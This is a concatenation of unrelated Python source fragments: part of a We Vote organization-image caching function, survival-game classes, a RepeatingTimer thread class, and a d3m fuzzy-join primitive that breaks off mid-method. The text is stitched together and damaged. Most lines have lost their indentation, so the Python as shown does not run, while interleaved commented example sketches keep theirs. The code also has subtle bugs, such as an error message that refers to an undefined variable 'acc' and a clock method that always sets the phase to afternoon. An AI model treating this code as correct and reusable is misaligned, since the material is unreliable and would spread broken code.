"".format(bucket_name=AWS_STORAGE_BUCKET_NAME,
we_vote_image_file_location=we_vote_image_file_location)
save_aws_info = we_vote_image_manager.save_we_vote_image_aws_info(we_vote_image, we_vote_image_url,
we_vote_image_file_location,
we_vote_parent_image_id, is_active_version)
status += " IMAGE_STORED_TO_AWS " + save_aws_info['status']
success = save_aws_info['success']
if not success:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
save_source_info_results = we_vote_image_manager.save_we_vote_image_organization_share_info(
we_vote_image, analyze_source_images_results['image_width'],
analyze_source_images_results['image_height'], we_vote_image.we_vote_image_url,
same_day_image_version, image_url_valid,
kind_of_image_chosen_favicon=kind_of_image_chosen_favicon, kind_of_image_chosen_logo=kind_of_image_chosen_logo,
kind_of_image_chosen_social_share_master=kind_of_image_chosen_social_share_master)
status += " " + save_source_info_results['status']
if not save_source_info_results['success']:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': False,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
    # set is_active_version False for other master images for the same organization
set_active_version_false_results = we_vote_image_manager.set_active_version_false_for_other_images(
organization_we_vote_id=organization_we_vote_id,
image_url_https=we_vote_image.we_vote_image_url,
kind_of_image_chosen_favicon=kind_of_image_chosen_favicon,
kind_of_image_chosen_logo=kind_of_image_chosen_logo,
kind_of_image_chosen_social_share_master=kind_of_image_chosen_social_share_master)
status += set_active_version_false_results['status']
results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': we_vote_image
}
return results
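# A minimal, illustrative sketch of caching an organization's chosen logo with
# cache_organization_sharing_image above. Pillow is assumed to be available (the module
# already works with python_image_library_image objects), and the organization_we_vote_id
# is a hypothetical placeholder.
def example_cache_chosen_logo(logo_file_path):
    from PIL import Image
    logo_image = Image.open(logo_file_path)
    results = cache_organization_sharing_image(
        python_image_library_image=logo_image,
        organization_we_vote_id="wv02org456",
        kind_of_image_original=True,
        kind_of_image_chosen_logo=True)
    return results['we_vote_image'] if results['success'] else None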
|
from dataclasses import dataclass
from enum import Enum
@dataclass
class Message:
_type: str
data: dict
class Survivor:
def __init__(
self,
id,
woodcutting=None,
foraging=None,
first_aid=None,
crafting=None,
cooking=None,
fighting=None,
):
self.id = id
self.woodcutting = woodcutting or 1
self.foraging = foraging or 1
self.first_aid = first_aid or 1
self.crafting = crafting or 1
self.cooking = cooking or 1
self.fighting = fighting or 1
class SurvivorGroup:
def __init__(self, survivors=None):
self.survivors = survivors or []
class World:
def __init__(self):
self.weather = "Raining"
class Time:
class PHASE(Enum):
MORNING = 1
AFTERNOON = 2
NIGHT = 3
def __init__(self):
self.epoch = 0
self.phase = self.PHASE.MORNING
def move(self):
self.epoch += 1
self.phase = self.PHASE.AFTERNOON
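# A minimal, illustrative sketch wiring the classes above together: two survivors in a
# group, a world, and a clock advanced by one phase. The ids and skill values are arbitrary.
def example_setup():
    group = SurvivorGroup(survivors=[Survivor(id=1, woodcutting=3), Survivor(id=2, cooking=2)])
    world = World()
    clock = Time()
    clock.move()  # epoch 1, phase AFTERNOON
    return group, world, clock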
|
"""Module containing class `RepeatingTimer`."""
from threading import Thread, Timer
class RepeatingTimer(Thread):
"""Timer that fires repeatedly."""
def __init__(self, interval, function, args=None, kwargs=None):
super().__init__()
self._interval = interval
self._function = function
        self._args = args if args is not None else []
        self._kwargs = kwargs if kwargs is not None else {}
self._timer = None
self._started = False
    def start(self):
        if self._started:
            raise ValueError('RepeatingTimer can be started only once.')
        else:
            self._started = True
            self._start_timer()
def _start_timer(self):
self._timer = Timer(self._interval, self._tick)
self._timer.start()
def _tick(self):
self._function(*self._args, **self._kwargs)
self._start_timer()
def cancel(self):
if self._timer is not None:
self._timer.cancel()
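# A minimal, illustrative usage sketch: fire a callback every two seconds until cancelled.
# The interval, callback, and sleep duration are arbitrary; cancel() stops the next
# scheduled tick (a tick already in flight still completes).
if __name__ == '__main__':
    import time
    def heartbeat(name):
        print('{}: still alive'.format(name))
    timer = RepeatingTimer(2.0, heartbeat, args=['worker'])
    timer.start()
    time.sleep(7)   # roughly three ticks fire during this window
    timer.cancel()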
|
#
# Copyright © 2021 Uncharted Software Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import typing
import os
import collections
import collections.abc
import pandas as pd # type: ignore
import numpy as np
import haversine as hs
from joblib import Parallel, delayed
from d3m import container, exceptions, utils as d3m_utils
from d3m.base import utils as d3m_base_utils
from d3m.metadata import base as metadata_base, hyperparams
from d3m.primitive_interfaces import base, transformer
from rapidfuzz import process
from haversine import Unit
from dateutil import parser
import version
__all__ = ("FuzzyJoinPrimitive",)
Inputs = container.Dataset
Outputs = container.Dataset
class Hyperparams(hyperparams.Hyperparams):
n_jobs = hyperparams.Hyperparameter[int](
default=-1,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="The value of the n_jobs parameter for the joblib library",
)
left_col = hyperparams.Union[typing.Union[str, typing.Sequence[str]]](
configuration=collections.OrderedDict(
set=hyperparams.Set(
elements=hyperparams.Hyperparameter[str](
default="",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Name of the column.",
),
default=(),
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="A set of column indices to force primitive to operate on. If any specified column cannot be parsed, it is skipped.",
),
str=hyperparams.Hyperparameter[str](
default="",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Name of the column.",
),
),
default="str",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Columns to join on from left dataframe",
)
right_col = hyperparams.Union[typing.Union[str, typing.Sequence[str]]](
configuration=collections.OrderedDict(
set=hyperparams.Set(
elements=hyperparams.Hyperparameter[str](
default="",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Name of the column.",
),
default=(),
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="A set of column indices to force primitive to operate on. If any specified column cannot be parsed, it is skipped.",
),
str=hyperparams.Hyperparameter[str](
default="",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Name of the column.",
),
),
default="str",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Columns to join on from right dataframe",
)
accuracy = hyperparams.Union[typing.Union[float, typing.Sequence[float]]](
configuration=collections.OrderedDict(
set=hyperparams.List(
elements=hyperparams.Hyperparameter[float](-1),
default=(),
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="A list of accuracies, corresponding respectively to the columns to join on.",
),
float=hyperparams.Hyperparameter[float](0),
),
default="float",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Required accuracy of join ranging from 0.0 to 1.0, where 1.0 is an exact match.",
)
join_type = hyperparams.Enumeration[str](
default="left",
values=("left", "right", "outer", "inner", "cross"),
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="The type of join between two dataframes.",
)
absolute_accuracy = hyperparams.Union[typing.Union[bool, typing.Sequence[bool]]](
configuration=collections.OrderedDict(
set=hyperparams.List(
elements=hyperparams.UniformBool(False),
default=(),
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="A list of flags for absolute values, corresponding respectively to the columns to join on.",
),
bool=hyperparams.UniformBool(False),
),
default="bool",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Used for numeric to use absolute comparison instead of percentage.",
)
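# A minimal, illustrative sketch of configuring the hyperparams above for a single-column
# fuzzy string join. The column names and threshold are hypothetical; defaults()/replace()
# are the standard d3m Hyperparams helpers and are assumed to behave as in other primitives.
def example_fuzzy_join_hyperparams():
    return Hyperparams.defaults().replace({
        'left_col': 'city_name',       # hypothetical column in the left dataset
        'right_col': 'municipality',   # hypothetical column in the right dataset
        'accuracy': 0.85,              # fuzzy string match threshold in (0.0, 1.0]
        'join_type': 'left',
    })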
class FuzzyJoinPrimitive(
transformer.TransformerPrimitiveBase[Inputs, Outputs, Hyperparams]
):
"""
    Placeholder fuzzy join primitive.
"""
_STRING_JOIN_TYPES = set(
(
"https://metadata.datadrivendiscovery.org/types/CategoricalData",
"http://schema.org/Text",
"http://schema.org/Boolean",
)
)
_NUMERIC_JOIN_TYPES = set(("http://schema.org/Integer", "http://schema.org/Float"))
_VECTOR_JOIN_TYPES = set(
("https://metadata.datadrivendiscovery.org/types/FloatVector",)
)
_GEO_JOIN_TYPES = set(
("https://metadata.datadrivendiscovery.org/types/BoundingPolygon",)
)
_DATETIME_JOIN_TYPES = set(("http://schema.org/DateTime",))
_SUPPORTED_TYPES = (
_STRING_JOIN_TYPES.union(_NUMERIC_JOIN_TYPES)
.union(_DATETIME_JOIN_TYPES)
.union(_VECTOR_JOIN_TYPES)
.union(_GEO_JOIN_TYPES)
)
__author__ = ("Uncharted Software",)
metadata = metadata_base.PrimitiveMetadata(
{
"id": "6c3188bf-322d-4f9b-bb91-68151bf1f17f",
"version": version.__version__,
"name": "Fuzzy Join Placeholder",
"python_path": "d3m.primitives.data_transformation.fuzzy_join.DistilFuzzyJoin",
"keywords": ["join", "columns", "dataframe"],
"source": {
"name": "Uncharted Software",
"contact": "mailto:cbethune@uncharted.software",
"uris": [
"https://github.com/uncharted-distil/distil-primitives-contrib/blob/main/main/distil_primitives_contrib/fuzzy_join.py",
"https://github.com/uncharted-distil/distil-primitives-contrib",
],
},
"installation": [
{
"type": metadata_base.PrimitiveInstallationType.PIP,
"package_uri": "git+https://github.com/uncharted-distil/distil-primitives-contrib.git@{git_commit}#egg=distil-primitives-contrib".format(
git_commit=d3m_utils.current_git_commit(
os.path.dirname(__file__)
),
),
},
],
"algorithm_types": [
metadata_base.PrimitiveAlgorithmType.ARRAY_CONCATENATION,
],
"primitive_family": metadata_base.PrimitiveFamily.DATA_TRANSFORMATION,
}
)
def produce(
self,
*,
left: Inputs, # type: ignore
right: Inputs, # type: ignore
timeout: float = None,
iterations: int = None,
) -> base.CallResult[Outputs]:
# attempt to extract the main table
try:
left_resource_id, left_df = d3m_base_utils.get_tabular_resource(left, None)
except ValueError as error:
raise exceptions.InvalidArgumentValueError(
"Failure to find tabular resource in left dataset"
) from error
try:
right_resource_id, right_df = d3m_base_utils.get_tabular_resource(
right, None
)
except ValueError as error:
raise exceptions.InvalidArgumentValueError(
"Failure to find tabular resource in right dataset"
) from error
accuracy = self.hyperparams["accuracy"]
absolute_accuracy = self.hyperparams["absolute_accuracy"]
# hyperparams may be parsed as tuples
# floats could be integers if round number is passed in
        if isinstance(accuracy, collections.abc.Iterable):
accuracy = [float(a) for a in accuracy]
else:
accuracy = float(accuracy)
        if isinstance(absolute_accuracy, collections.abc.Iterable):
absolute_accuracy = list(absolute_accuracy)
if type(accuracy) == float and not type(absolute_accuracy) == bool:
raise exceptions.InvalidArgumentValueError(
"only 1 value of accuracy provided, but multiple values for absolute accuracy provided"
)
if (not type(accuracy) == float) and type(absolute_accuracy) == bool:
raise exceptions.InvalidArgumentValueError(
"only 1 for absolute accuracy provided, but multiple values of accuracy provided"
)
if type(accuracy) == float and not absolute_accuracy:
if accuracy <= 0.0 or accuracy > 1.0:
raise exceptions.InvalidArgumentValueError(
"accuracy of " + str(accuracy) + " is out of range"
)
elif type(accuracy) == list and type(absolute_accuracy) == list:
if not len(accuracy) == len(absolute_accuracy):
raise exceptions.InvalidArgumentValueError(
"the count of accuracy hyperparams does not match the count of absolute_accuracy hyperparams"
)
for i in range(len(accuracy)):
if (accuracy[i] <= 0.0 or accuracy[i] > 1.0) and not absolute_accuracy[i]:
raise exceptions.InvalidArgumentValueError(
"accuracy of " + str(acc) + " is out of range"
)
left_col = self.hyperparams["left_col"]
right_col = self.hyperparams["right_col"]
if type(left_col) != type(right_col) or (
type(left_col) == list
and len(left_col) != len(right_col)
and type(accuracy) != list
and len(accuracy) != len(left_col)
):
raise exceptions.InvalidArgumentTypeError(
"both left_col and right_col need to have same data type and if they are lists, the same list lengths"
)
if type(left_col) == str:
left_col = [left_col]
right_col = [right_col]
accuracy = [accuracy]
absolute_accuracy = [absolute_accuracy]
join_types = [
self._get_join_semantic_type(
left,
left_resource_id,
left_col[i],
right,
right_resource_id,
right_col[i],
)
for i in range(len(left_col))
]
num_splits = 32
joined_split = [None for i in range(num_splits)]
left_df_split = np.array_split(left_df, num_splits)
jobs = [delayed(self._produce_threaded)(
index = i,
left_df_full = left_df,
left_dfs = left_df_split,
right_df = right_df,
join_types = join_types,
left_col = left_col,
right_col = right_col,
accuracy = accuracy,
absolute_accuracy = absolute_accuracy
) for i in range(num_splits)]
joined_data = Parallel(n_jobs=self.hyperparams["n_jobs"], backend="loky", verbose=10)(jobs)
        # joined data needs to maintain order to mimic non-split joining
for i, d in joined_data:
joined_split[i] = d
joined = pd.concat(joined_split, ignore_index = True)
# create a new dataset to hold the joined data
resource_map = {}
float_vector_columns = {}
for resource_id, resource in left.items(): # type: ignore
if resource_id == left_resource_id:
for column in joined.columns:
# need to avoid bug in container.Dataset, it doesn't like vector columns
if type(joined[column].iloc[0]) == np.ndarray:
float_vector_columns[column] = joined[column]
joined[column] = np.NAN
resource_map[resource_id] = joined
else:
resource_map[resource_id] = resource
# Generate metadata for the dataset using only the first row of the resource for speed -
# metadata generation runs over each cell in the dataframe, but we only care about column
# level generation. Once that's done, set the actual dataframe value.
result_dataset = container.Dataset(
{k: v.head(1) for k, v in resource_map.items()}, generate_metadata=True
)
for k, v in resource_map.items():
result_dataset[k] = v
result_dataset.metadata = result_dataset.metadata.update(
(k,), {"dimension": {"length": v.shape[0]}}
)
for key in float_vector_columns.keys():
df = result_dataset[left_resource_id]
df[key] = float_vector_columns[key]
float_vec_loc = df.columns.get_loc(key)
float_vec_col_indices = df.metadata.list_columns_with_semantic_types(
("https://metadata.datadrivendiscovery.org/types/FloatVector",)
)
if float_vec_loc not in float_vec_col_indices:
df.metadata = df.metadata.add_semantic_type(
(metadata_base.ALL_ELEMENTS, float_vec_loc),
"https://metadata.datadrivendiscovery.org/types/FloatVector",
)
return base.CallResult(result_dataset)
def _produce_threaded(
self,
*,
index: int,
left_df_full: container.DataFrame, # type: ignore
left_dfs: typing.Sequence[container.DataFrame], # type: ignore
right_df: container.DataFrame, # type: ignore
join_types: typing.Sequence[str],
        left_col: typing.Sequence[str],
        right_col: typing.Sequence[str],
accuracy: typing.Sequence[float],
absolute_accuracy: typing.Sequence[bool]
) -> typing.Tuple[int, base.CallResult[Outputs]]:
if left_dfs[index].empty:
return (index, None)
output = self._produce(
left_df_full = left_df_full,
left_df = left_dfs[index].reset_index(drop=True),
right_df = right_df.copy(),
join_types = join_types,
left_col = left_col,
right_col = right_col,
accuracy = accuracy,
absolute_accuracy = absolute_accuracy
)
return (index, output)
def _produce(
self,
*,
left_df_full: container.DataFrame, # type: ignore
left_df: container.DataFrame, # type: ignore
right_df: container.DataFrame, # type: ignore
join_types: typing.Sequence[str],
        left_col: typing.Sequence[str],
        right_col: typing.Sequence[str],
accuracy: typing.Sequence[float],
absolute_accuracy: typing.Sequence[bool]
) -> base.CallResult[Outputs]:
# cycle through the columns to join the dataframes
right_cols_to_drop = []
new_left_cols = []
new_right_cols = []
for col_index in range(len(left_col)):
# depending on the joining type, make a new dataframe that has columns we will want to merge on
# keep track of which columns we will want to drop later on
if len(self._STRING_JOIN_TYPES.intersection(join_types[col_index])) > 0:
new_left_df = self._create_string_merge_cols(
left_df,
left_col[col_index],
right_df,
right_col[col_index],
accuracy[col_index],
col_index,
)
left_df[new_left_df.columns] = new_left_df
right_name = "righty_string" + str(col_index)
right_df.rename(
columns={right_col[col_index]: right_name}, inplace=True
)
new_left_cols += list(new_left_df.columns)
new_right_cols.append(right_name)
elif len(self._NUMERIC_JOIN_TYPES.intersection(join_types[col_index])) > 0:
new_left_df = self._create_numeric_merge_cols(
left_df,
left_col[col_index],
right_df,
right_col[col_index],
accuracy[col_index],
col_index,
absolute_accuracy[col_index],
)
left_df[new_left_df.columns] = new_left_df
right_name = "righty_numeric" + str(col_index)
right_df.rename(
columns={right_col[col_index]: right_name}, inplace=True
)
new_left_cols += list(new_left_df.columns)
new_right_cols.append(right_name)
elif len(self._GEO_JOIN_TYPES.intersection(join_types[col_index])) > 0:
new_left_df, new_right_df = self._create_geo_vector_merging_cols(
left_df,
left_col[col_index],
right_df,
right_col[col_index],
accuracy[col_index],
col_index,
absolute_accuracy[col_index],
)
left_df[new_left_df.columns] = new_left_df
right_df[new_right_df.columns] = new_right_df
new_left_cols += list(new_left_df.columns)
new_right_cols += list(new_right_df.columns)
right_cols_to_drop.append(right_col[col_index])
elif len(self._VECTOR_JOIN_TYPES.intersection(join_types[col_index])) > 0:
new_left_df, new_right_df = self._create_vector_merging_cols(
left_df,
left_col[col_index],
right_df,
right_col[col_index],
accuracy[col_index],
col_index,
absolute_accuracy[col_index],
)
left_df[new_left_df.columns] = new_left_df
right_df[new_right_df.columns] = new_right_df
new_left_cols += list(new_left_df.columns)
new_right_cols += list(new_right_df.columns)
right_cols_to_drop.append(right_col[col_index])
elif len(self._DATETIME_JOIN_TYPES.intersection(join_types[col_index])) > 0:
tolerance = self._compute_datetime_tolerance(left_df_full, left_col[col_index], right_df, right_col[col_index], accuracy[col_index])
new_left_df, new_right_df = self._create_datetime_merge_cols(
left_df,
left_col[col_index],
right_df,
right_col[col_index],
tolerance,
col_index,
)
left_df[new_left_df.columns] = new_left_df
right_df[new_right_df.columns] = new_right_df
new_left_cols += list(new_left_df.columns)
new_right_cols += list(new_right_df.columns)
right_cols_to_drop.append(right_col[col_index])
else:
raise exceptions.InvalidArgumentValueError(
"join not surpported on type " + str(join_types[col_index])
)
if "d3mIndex" in right_df.columns:
right_cols_to_drop.append("d3mIndex")
right_df.drop(columns=right_cols_to_drop, inplace=True)
joined = pd.merge(
left_df,
right_df,
how=self.hyperparams["join_type"],
left_on=new_left_cols,
right_on=new_right_cols,
suffixes=["_left", "_right"],
)
# don't want to keep columns that were created specifically for merging
# also, inner merge keeps the right column we merge on, we want to remove it
joined.drop(columns=new_left_cols + new_right_cols, inplace=True)
return joined
def multi_produce(
self,
*,
produce_methods: typing.Sequence[str],
left: Inputs,
right: Inputs, # type: ignore
timeout: float = None,
iterations: int = None,
) -> base.MultiCallResult: # type: ignore
return self._multi_produce(
produce_methods=produce_methods,
timeout=timeout,
iterations=iterations,
left=left,
right=right,
)
def fit_multi_produce(
self,
*,
produce_methods: typing.Sequence[str],
left: Inputs,
right: Inputs, # type: ignore
timeout: float = None,
iterations: int = None,
) -> base.MultiCallResult: # type: ignore
return self._fit_multi_produce(
produce_methods=produce_methods,
timeout=timeout,
iterations=iterations,
left=left,
right=right,
)
@classmethod
def _get_join_semantic_type(
cls,
left: container.Dataset,
left_resource_id: str,
left_col: str,
right: container.Dataset,
right_resource_id: str,
right_col: str,
) -> typing.Sequence[str]:
# get semantic types for left and right cols
left_types = cls._get_column_semantic_type(left, left_resource_id, left_col)
right_types = cls._get_column_semantic_type(right, right_resource_id, right_col)
# extract supported types
supported_left_types = left_types.intersection(cls._SUPPORTED_TYPES)
supported_right_types = right_types.intersection(cls._SUPPORTED_TYPES)
# check for exact match
join_types = list(supported_left_types.intersection(supported_right_types))
if len(join_types) == 0:
if (
len(left_types.intersection(cls._NUMERIC_JOIN_TYPES)) > 0
and len(right_types.intersection(cls._NUMERIC_JOIN_TYPES)) > 0
):
# no exact match, but FLOAT and INT are allowed to join
join_types = ["http://schema.org/Float"]
elif (
len(left_types.intersection(cls._STRING_JOIN_TYPES)) > 0
and len(right_types.intersection(cls._STRING_JOIN_TYPES)) > 0
):
# no exact match, but any text-based type is allowed to join
join_types = ["http://schema.org/Text"]
return join_types
@classmethod
def _get_column_semantic_type(
cls, dataset: container.Dataset, resource_id: str, col_name: str
) -> typing.Set[str]:
for col_idx in range(
dataset.metadata.query((resource_id, metadata_base.ALL_ELEMENTS))[
"dimension"
]["length"]
):
col_metadata = dataset.metadata.query(
(resource_id, metadata_base.ALL_ELEMENTS, col_idx)
)
if col_metadata.get("name", "") == col_name:
return set(col_metadata.get("semantic_types", ()))
return set()
@classmethod
def _string_fuzzy_match(
cls, match: typing.Any, choices: typing.Sequence[typing.Any], min_score: float
) -> typing.Optional[str]:
choice, score, index = process.extractOne(match, choices)
val = None
if score >= min_score:
val = choice
return val
@classmethod
def _create_string_merge_cols(
cls,
left_df: container.DataFrame,
left_col: str,
right_df: container.DataFrame,
right_col: str,
accuracy: float,
index: int,
) -> pd.DataFrame:
if accuracy < 1:
left_keys = left_df[left_col].unique()
right_keys = right_df[right_col].unique()
matches: typing.Dict[str, typing.Optional[str]] = {}
for left_key in left_keys:
matches[left_key] = cls._string_fuzzy_match(
left_key, right_keys, accuracy * 100
)
new_left_df = container.DataFrame(
{
"lefty_string"
+ str(index): left_df[left_col].map(lambda key: matches[key])
}
)
else:
new_left_df = container.DataFrame(
{"lefty_string" + str(index): left_df[left_col]}
)
return new_left_df
    @staticmethod
    def _numeric_fuzzy_match(match, choices, accuracy, is_absolute):
# not sure if this is faster than applying a lambda against the sequence - probably is
min_distance = float("inf")
min_val = float("nan")
if is_absolute:
tolerance = accuracy
else:
inv_accuracy = 1.0 - accuracy
tolerance = float(match) * inv_accuracy
for i, num in enumerate(choices):
distance = abs(match - num)
if distance <= tolerance and distance <= min_distance:
min_val = num
min_distance = distance
return min_val
    @staticmethod
    def _geo_fuzzy_match(match, choices, col, accuracy, is_absolute):
# assume the accuracy is meters
if not is_absolute:
raise exceptions.InvalidArgumentTypeError(
"geo fuzzy match requires an absolute accuracy parameter that specifies the tolerance in meters"
)
# keep the set of choices that falls within the acceptable distance
return choices[choices[col].map(lambda x: hs.haversine(match, x, Unit.METERS)) < accuracy]
@classmethod
def _create_numeric_merge_cols(
cls,
left_df: container.DataFrame,
left_col: str,
right_df: container.DataFrame,
right_col: str,
accuracy: float,
index: int,
is_absolute: bool,
) -> pd.DataFrame:
choices = right_df[right_col].unique()
new_left_df = container.DataFrame(
{
"lefty_numeric"
+ str(index): pd.to_numeric(left_df[left_col]).map(
lambda x: cls._numeric_fuzzy_match(
x, choices, accuracy, is_absolute
)
)
}
)
return new_left_df
@classmethod
def _create_geo_vector_merging_cols(
cls,
left_df: container.DataFrame,
left_col: str,
right_df: container.DataFrame,
right_col: str,
accuracy: float,
index: int,
is_absolute: bool,
) -> pd.DataFrame:
def fromstring(x: str) -> np.ndarray:
return np.fromstring(x, dtype=float, sep=",")
def topoints(x: np.ndarray) -> typing.Sequence[typing.Sequence[float]]:
# create a sequence of points by joining two successive values
it = iter(x)
return list(zip(it, it))
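# Illustrative note (not part of the original method): topoints pairs up successive values,
# so a hypothetical flat lat/lon vector np.fromstring("44.0,-103.0,44.5,-103.5", dtype=float, sep=",")
# becomes [(44.0, -103.0), (44.5, -103.5)], i.e. a list of points that can be fed to the
# haversine distance check in _geo_fuzzy_match.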
if type(left_df[left_col].iloc[0]) == str:
left_vector_length = np.fromstring(
left_df[left_col].iloc[0], dtype=float, sep=","
).shape[0]
new_left_cols = [
"lefty_vector" + str(index) + "_" + str(i)
for i in range(int(left_vector_length/2))
]
new_left_df = container.DataFrame(
left_df[left_col]
.apply(fromstring, convert_dtype=False)
.apply(topoints)
.values.tolist(),
columns=new_left_cols,
)
else:
left_vector_length = left_df[left_col].iloc[0].shape[0]
new_left_cols = [
"lefty_vector" + str(index) + "_" + str(i)
for i in range(int(left_vector_length/2))
]
new_left_df = container.DataFrame(
left_df[left_col].apply(topoints).values.tolist(),
columns=new_left_cols,
)
if type(right_df[right_col].iloc[0]) == str:
right_vector_length = np.fromstring(
right_df[right_col].iloc[0], dtype=float, sep=","
).shape[0]
new_right_cols = [
"righty_vector" + str(index) + "_" + str(i)
for i in range(int(right_vector_length/2))
]
new_right_df = container.DataFrame(
right_df[right_col]
.apply(fromstring, convert_dtype=False)
.apply(topoints)
.values.tolist(),
columns=new_right_cols,
)
else:
right_vector_length = right_df[right_col].iloc[0].shape[0]
new_right_cols = [
"righty_vector" + str(index) + "_" + str(i)
for i in range(int(right_vector_length/2))
]
new_right_df = container.DataFrame(
right_df[right_col].apply(topoints).values.tolist(),
columns=new_right_cols,
)
# get a unique name to hold the possible matches
base_name = 'righty_lefty'
unique_name = base_name
count = 1
while unique_name in new_left_df.columns:
unique_name = base_name + f'_{count}'
count = count + 1
# get an initial set of possible matches (should usually be a very small subset)
new_left_df[unique_name] = pd.Series([cls._geo_fuzzy_match(
p,
new_right_df,
new_right_cols[0],
accuracy,
is_absolute
) for p in new_left_df[new_left_cols[0]]])
# process the remaining vector values to narrow down the set of matches
# this could have all been done in a single loop, but keeping it separate is slightly cleaner
for i in range(1, len(new_left_cols)):
new_left_df[unique_name] = pd.Series([cls._geo_fuzzy_match(
p,
f,
new_right_cols[i],
accuracy,
is_absolute
) for (p, f) in zip(new_left_df[new_left_cols[i]], new_left_df[unique_name])])
# reduce the set of matches to either the first match or an empty set
# NOTE: this is not the best way - for joins, either all matches should be kept or only
# the closest match should be kept. The previous implementation was even worse, as it only
# kept the nearest match at any given point, so if one polygon was not nearest at every
# point, then no match was made.
tmp_df_left = pd.concat(new_left_df[unique_name].map(lambda x: x.head(1) if len(x) > 0 else pd.DataFrame([[None] * len(new_right_cols)], columns=new_right_cols)).tolist(), ignore_index=True)
new_left_df[new_left_cols] = tmp_df_left[new_right_cols]
new_left_df.drop(columns=[unique_name], inplace=True)
return (new_left_df, new_right_df)
@classmethod
def _create_vector_merging_cols(
cls,
left_df: container.DataFrame,
left_col: str,
right_df: container.DataFrame,
right_col: str,
accuracy: float,
index: int,
is_absolute: bool,
) -> pd.DataFrame:
def fromstring(x: str) -> np.ndarray:
return np.fromstring(x, dtype=float, sep=",")
if type(left_df[left_col].iloc[0]) == str:
left_vector_length = np.fromstring(
left_df[left_col].iloc[0], dtype=float, sep=","
).shape[0]
new_left_cols = [
"lefty_vector" + str(index) + "_" + str(i)
for i in range(left_vector_length)
]
new_left_df = container.DataFrame(
left_df[left_col]
.apply(fromstring, convert_dtype=False)
.values.tolist(),
columns=new_left_cols,
)
else:
left_vector_length = left_df[left_col].iloc[0].shape[0]
new_left_cols = [
"lefty_vector" + str(index) + "_" + str(i)
for i in range(left_vector_length)
]
new_left_df = container.DataFrame(
left_df[left_col].values.tolist(),
columns=new_left_cols,
)
if type(right_df[right_col].iloc[0]) == str:
right_vector_length = np.fromstring(
right_df[right_col].iloc[0], dtype=float, sep=","
).shape[0]
new_right_cols = [
"righty_vector" + str(index) + "_" + str(i)
for i in range(right_vector_length)
]
new_right_df = container.DataFrame(
right_df[right_col]
.apply(fromstring, convert_dtype=False)
.values.tolist(),
columns=new_right_cols,
)
else:
right_vector_length = right_df[right_col].iloc[0].shape[0]
new_right_cols = [
"righty_vector" + str(index) + "_" + str(i)
for i in range(right_vector_length)
]
new_right_df = container.DataFrame(
right_df[right_col].values.tolist(),
columns=new_right_cols,
)
for i in range(len(new_left_cols)):
new_left_df[new_left_cols[i]] = new_left_df[new_left_cols[i]].map(
lambda x: cls._numeric_fuzzy_match(
x,
new_right_df[new_right_cols[i]],
accuracy,
is_absolute,
)
)
return (new_left_df, new_right_df)
@classmethod
def _create_datetime_merge_cols(
cls,
left_df: container.DataFrame,
left_col: str,
right_df: container.DataFrame,
right_col: str,
tolerance: float,
index: int,
) -> pd.DataFrame:
# use d3mIndex from left col if present
# compute a tolerance delta for time matching based on a percentage of the minimum left/right time
# range
left_name = "lefty_datetime" + str(index)
right_name = "righty_datetime" + str(index)
new_right_df = container.DataFrame(
{
right_name: np.array(
[np.datetime64(parser.parse(dt)) for dt in right_df[right_col]]
)
}
)
choices = np.unique(new_right_df[right_name])
left_keys = np.array(
[np.datetime64(parser.parse(dt)) for dt in left_df[left_col].values]
)
new_left_df = container.DataFrame(
{
left_name: np.array(
[
cls._datetime_fuzzy_match(dt, choices, tolerance)
for dt in left_keys
]
)
}
)
return new_left_df, new_right_df
@classmethod
def _datetime_fuzzy_match(
cls,
match: np.datetime64,
choices: typing.Sequence[np.datetime64],
tolerance: np.timedelta64,
) -> typing.Optional[np.datetime64]:
min_distance = None
min_date = None
for i, date in enumerate(choices):
distance = abs(match - date)
if distance <= tolerance and (
min_distance is None or distance < min_distance
):
min_distance = distance
min_date = date
# default empty match to NaT to make it valid for datetime typing
if min_date is None:
min_date = pd.NaT
return min_date
@classmethod
def _compute_time_range(
cls, left: typing.Sequence[np.datetime64], right: typing.Sequence[np.datetime64]
) -> float:
left_min = np.amin(left)
left_max = np.amax(left)
left_delta = left_max - left_min
right_min = np.amin(right)
right_max = np.amax(right)
right_delta = right_max - right_min
return min(left_delta, right_delta)
@classmethod
def _compute_datetime_tolerance(cls,
left_df: container.DataFrame,
left_col: str,
right_df: container.DataFrame,
right_col: str,
accuracy: float
) -> float:
